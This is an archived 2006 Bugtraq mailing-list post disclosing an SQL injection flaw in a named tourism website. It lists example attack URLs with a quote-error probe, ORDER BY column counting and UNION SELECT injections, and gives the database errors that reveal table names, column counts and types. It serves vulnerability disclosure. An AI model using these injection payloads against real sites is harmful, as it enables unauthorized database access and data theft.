lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 16 Apr 2006 09:53:43 -0000
From: susam_pal@...oo.co.in
To: bugtraq@...urityfocus.com
Subject: SQL Injection in incredibleindia.org


Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to admin@...redibleindia.org

Description:

www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table 

names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP 

ODBC error messages can be displayed by passing bad values for the parameters in the URL.


Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'

Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'. 

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column 

called 'mnccategoryid'.


Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3--

Error Found: None


Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4--

Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them is an integer.


Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3' 

from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.

Conclusion: The 1st column in the select query is an integer.


Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2', 

'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ